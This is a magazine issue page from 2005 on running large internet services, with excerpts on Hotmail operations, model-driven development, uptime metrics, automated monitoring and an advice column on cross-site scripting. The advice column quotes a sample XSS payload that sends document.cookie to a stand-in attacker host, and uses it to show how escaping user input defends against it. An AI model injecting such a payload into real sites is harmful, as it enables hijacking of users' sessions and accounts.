Managing Megaservices

Vol. 3 No. 10 – December 2005

Interviews

A Conversation with Phil Smoot

The challenges of managing a megaservice

In the landscape of today’s megaservices, Hotmail just might be Mount Everest. One of the oldest free Web e-mail services, Hotmail relies on more than 10,000 servers spread around the globe to process billions of e-mail transactions per day. What’s interesting is that despite this enormous amount of traffic, Hotmail needs fewer than 100 system administrators to manage it all.

To understand how they do it, and to learn more about what it takes to manage such an enormous service, we invited Hotmail engineer Phil Smoot to speak with us. Smoot has been with Microsoft for 11 years and is a product unit manager in Microsoft’s MSN division. He manages the product development teams in Silicon Valley that are responsible for the Hotmail-MSN Communication platform, which includes storage, e-mail delivery, spam prevention, protocol services, directory services, and data warehousing. Prior to Hotmail, Smoot worked with a variety of groups at Microsoft, including the Visual Basic team, Microsoft Research, WebTV, and Microsoft Sales and Consulting. His academic background is in physics and computer science.

Curmudgeon

Anything Su Doku, I Can Do Better

The new puzzle craze from Japan is sweeping the world and testing our Boolean logic.

STAN KELLY-BOOTLE, AUTHOR

I dedicate this essay in memoriam to Jef Raskin (March 9, 1943 - February 26, 2005). Many more authoritative tributes than I can muster continue to pour in, and no doubt a glorious Festschrift will be forthcoming from those who admired this remarkable polymath. “Le don de vivre a passé dans les fleurs.” (“The gift of living has passed into the flowers.”)

By a quirk of fate that Jef would have loved, IBM announced the death of OS/2 during the week he died. Or rather, it released what PC World called “an official roadmap to the demise of OS/2.” One imagines a GPS intoning, “Hang a left, then straight for six months. Watch out for road-bumps. Stop at the Stop sign. Your journey is over. Abandon your vehicle. Thanks for your custom and patience.”

by Stan Kelly-Bootle

Articles

Coding for the Code

Can models provide the DNA for software development?

FRIEDRICH STEIMANN, FERNUNIVERSITÄT IN HAGEN, AND THOMAS KÜHNE, DARMSTADT UNIVERSITY OF TECHNOLOGY

Despite the considerable effort invested by industry and academia in modeling standards such as UML (Unified Modeling Language), software modeling has long played a subordinate role in commercial software development. Although modeling is generally perceived as state of the art and thus as something that ought to be done, its perceived value seems to fade as a software project moves from its early, more conceptual phases to those where the actual handcrafting is done. In practice, while models have been found useful for documentation purposes and as rough sketches of implementations, their ultimate value has been severely limited by their ambiguity and their tendency to get out of sync with the final code.

More recently, hopes that modeling might reach its deserved place in the software engineering process have been refueled by so-called MDD (model-driven development) initiatives, most prominently advanced by IBM and the OMG (Object Management Group).1 The underlying idea is to promote models to the primary artifacts of software development, making executable code a pure derivative. According to this development paradigm, software is generated—with the aid of suitable transformations—from a compact description (the model) that is more easily read and maintained by humans than any other form of software specification in use today. Using a metaphor from biology, such a model would be the construction plan—the DNA—of software, and the transformations the ribosomes of the construction process.
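
To make the idea concrete, here is a toy sketch in Python. The model format and the generate_class transformation are invented for illustration only; real MDD toolchains work from UML or domain-specific models and apply far richer transformations.

# A small declarative "model" is the primary artifact; executable code is
# derived from it by a transformation. The model format and generator are
# hypothetical, not part of any OMG/MDA toolchain.
customer_model = {
    "name": "Customer",
    "attributes": {"id": "int", "name": "str", "email": "str"},
}

def generate_class(model: dict) -> str:
    """Transformation: derive Python source code from the model."""
    lines = [f"class {model['name']}:"]
    params = ", ".join(f"{a}: {t}" for a, t in model["attributes"].items())
    lines.append(f"    def __init__(self, {params}):")
    for attr in model["attributes"]:
        lines.append(f"        self.{attr} = {attr}")
    return "\n".join(lines)

print(generate_class(customer_model))

Because the code is regenerated whenever the model changes, the two cannot drift apart, which is precisely the "out of sync" problem described above.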

by Friedrich Steimann, Thomas Kühne

Lessons from the Floor

The manufacturing industry can teach us a lot about measuring performance in large-scale Internet services.

DANIEL ROGERS, MICROSOFT

The January monthly service quality meeting started normally—around the table were representatives from development, operations, marketing, and product management, and the agenda focused on the prior month’s performance. As usual, customer-impacting incidents and quality of service were key topics, and I was armed with the numbers showing the average uptime for the part of the service that I represent: MSN, the Microsoft family of services that includes e-mail, Instant Messenger, news, weather and sports, etc.

Running a service of this size, with thousands of servers behind the scenes, makes it hard to boil performance down to simple averages. Managing a service that provides news, weather, stock quotes, instant messaging, blogs, and hundreds of millions of e-mail accounts by aggregating uptime percentages has proven to be less than effective because a lot of detail is hidden behind the numbers. The customer service calls we handled during the month represented just over 0.004 percent (that’s right, four one-thousandths of a percent) of the overall service provided—so is it a problem or not?
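
To see how an aggregate average can look healthy while one piece of the service is in real trouble, consider a small sketch with made-up numbers; the components, traffic shares, and uptime figures below are hypothetical, not MSN's actual data.

# Per-component uptime for a month and each component's share of traffic.
components = {
    "mail":         (0.9999, 0.60),
    "messenger":    (0.9995, 0.25),
    "news":         (0.9990, 0.10),
    "stock_quotes": (0.9000, 0.05),  # down roughly three days this month
}

# Traffic-weighted average: about 99.5 percent, which looks fine.
weighted_uptime = sum(up * share for up, share in components.values())
print(f"aggregate uptime: {weighted_uptime:.4%}")

# The same data viewed per component reveals a serious incident.
worst_name, (worst_up, _) = min(components.items(), key=lambda kv: kv[1][0])
print(f"worst component: {worst_name} at {worst_up:.2%}")

The 90 percent entry all but vanishes into the average, which is the sense in which a lot of detail hides behind the numbers.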

by Daniel Rogers

Monitoring, at Your Service

Automated monitoring can increase the reliability and scalability of today’s online software services.

BILL HOFFMAN, MICROSOFT

Internet services are becoming more and more a part of our daily lives. We derive value from them, depend on them, and are now beginning to assume their ubiquity as we do the phone system and electricity grid. The implementation of Internet services, though, is an unsolved problem, and Internet services remain far from fulfilling their potential in our world.

Internet services are implemented as large, distributed computer systems. Large computer systems require human operators. Hardware fails, software fails, facilities require management. Humans act as the white blood cells that keep the systems working. Humans diagnose problems. Humans replace broken hardware. Humans remove damaged nodes from systems. Humans tune systems to the changing demands of large user bases, optimizing as new features are added and new access patterns emerge. Humans respond to external abuse of services.
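
As a rough illustration of the kind of automation the article argues for, here is a minimal sketch in Python; the endpoints, timeout, polling interval, and alerting behavior are assumptions for illustration, not a description of MSN's monitoring systems.

import time
import urllib.error
import urllib.request

def check_endpoint(url: str, timeout_s: float = 2.0) -> dict:
    """Probe one service endpoint and report health and latency."""
    start = time.monotonic()
    try:
        with urllib.request.urlopen(url, timeout=timeout_s) as resp:
            healthy = resp.status == 200
    except (urllib.error.URLError, OSError):
        healthy = False
    return {"url": url, "healthy": healthy, "latency_s": time.monotonic() - start}

def monitor(urls, interval_s: float = 30.0):
    """Poll endpoints forever; flag failures instead of waiting for a human."""
    while True:
        for result in map(check_endpoint, urls):
            if not result["healthy"]:
                # A real service would page an operator or trigger automated
                # remediation here; this sketch just prints an alert.
                print("ALERT:", result)
        time.sleep(interval_s)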

by Bill Hoffman

Kode Vicious

Vicious XSS

For readers who doubt the relevance of KV’s advice, witness the XSS (cross-site scripting) attack that befell the social networking site MySpace.com in October (http://www.betanews.com/article/CrossSite_Scripting_Worm_Hits_MySpace/1129232391). This month Kode Vicious addresses just this sort of XSS attack. And in response to the reader’s question below, it’s a good thing cross-site scripting is not abbreviated CSS, as the MySpace hacker used CSS (cascading style sheets) to perpetrate his XSS attack. That would have made for one confusing story, eh? Read on for KV’s take on this XSS madness.

Dear KV,
I know you usually spend all your time deep in the bowels of systems with C and C++ (at least that’s what I gather from reading your columns), but I was wondering if you could help me with a problem in a language a little further removed from low-level bits and bytes, PHP. Most of the systems where I work are written in PHP, and, as I bet you’ve already worked out, those systems are Web sites. My most recent project is a merchant site that will also support user comments. Users will be able to submit reviews of products and merchants to the site. One of the things that our QA team keeps complaining about is possible XSS attacks. Our testers seem to have a special ability to find these, so I wanted to ask you about this. First, why is XSS such a big deal to them; second, how can I avoid having such bugs in my code; and finally, why is cross-site scripting abbreviated XSS instead of CSS?
Cross with Scripted Sites

Dear CSS,
First, let’s get something straight: I may spend a lot of time with C and C++, but I object to the use of the word bowels in this context. My job is bad enough without having this image of literally working in the bowels of anything.
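
(KV’s full answer appears in the column. As a minimal illustration of the defense the letter writer is asking about, shown here in Python rather than PHP and with an invented review string, escaping untrusted input before writing it into a page keeps a submitted review from becoming executable script.)

import html

# A hypothetical malicious "review" submitted by a user.
user_review = '<script>document.location="http://evil.example/?c=" + document.cookie</script>'

# Unsafe: the browser would treat the injected tag as markup and run it.
unsafe_html = f"<div class='review'>{user_review}</div>"

# Safer: special characters are escaped, so the text renders as text.
safe_html = f"<div class='review'>{html.escape(user_review)}</div>"

print(safe_html)
# Prints the review with &lt;script&gt; ... &lt;/script&gt; instead of live markup.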

by George Neville-Neil